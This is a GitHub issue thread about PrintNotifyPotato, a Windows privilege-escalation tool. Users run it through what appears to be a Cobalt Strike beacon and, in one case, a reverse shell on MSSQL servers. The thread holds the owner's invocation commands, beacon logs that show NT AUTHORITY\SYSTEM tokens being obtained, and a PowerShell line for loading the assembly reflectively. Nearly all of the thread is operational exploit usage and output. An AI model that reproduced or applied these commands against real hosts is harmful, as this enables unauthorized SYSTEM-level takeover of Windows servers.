Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

不显示 nt authority\system #2

Open
kokxxoo opened this issue Dec 13, 2022 · 5 comments
Open

不显示 nt authority\system #2

kokxxoo opened this issue Dec 13, 2022 · 5 comments

Comments

@kokxxoo
Copy link

kokxxoo commented Dec 13, 2022

Microsoft Windows Server 2012 R2 Standard

SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Disabled SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Enabled SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Disabled

[+] received output:
[] Create PrintNotify Success!
[] Create FakeIUnknown Success!
[] CreatePointerMoniker Success!
[] Trigger......

[+] received output:
[] Got Token: 0x330
[] CurrentUser: NT AUTHORITY\SYSTEM
[] DuplicateTokenEx Success! PrimaryToken: 0x860
[] process start with pid 31060
@BeichenDream
Copy link
Owner

PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"

@kokxxoo
Copy link
Author

kokxxoo commented Dec 13, 2022

[] Tasked beacon to run .NET program: PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"
[+] host called home, sent: 128121 bytes
[+] received output:
[] Create PrintNotify Success!
[] Create FakeIUnknown Success!
[] CreatePointerMoniker Success!
[] Trigger......
[] Got Token: 0x334

[+] received output:
[] CurrentUser: NT AUTHORITY\SYSTEM
[] DuplicateTokenEx Success! PrimaryToken: 0x852
[*] process start with pid 41840

@BeichenDream
Copy link
Owner 

PrintNotifyPotato.exe  C:\Windows\System32\whoami.exe

@kokxxoo
Copy link
Author

kokxxoo commented Dec 13, 2022

Tasked beacon to run .NET program: PrintNotifyPotato.exe C:\Windows\System32\whoami.exe
[+] host called home, sent: 128103 bytes
[+] received output:
[] Create PrintNotify Success!
[] Create FakeIUnknown Success!
[] CreatePointerMoniker Success!
[] Trigger......
[] Got Token: 0x31c
[] CurrentUser: NT AUTHORITY\SYSTEM
[] DuplicateTokenEx Success! PrimaryToken: 0x832
[] process start with pid 46152

@kaeso
Copy link

kaeso commented Apr 7, 2023
edited
Loading

MSSQL server, virtualbox, windows server 2016, 2019.
When running it as user in cmd - works, in reverse shell not working. Why?

Assembly loaded to powershell:
$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

Only on reverse tcp not working

[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@kaeso @kokxxoo @BeichenDream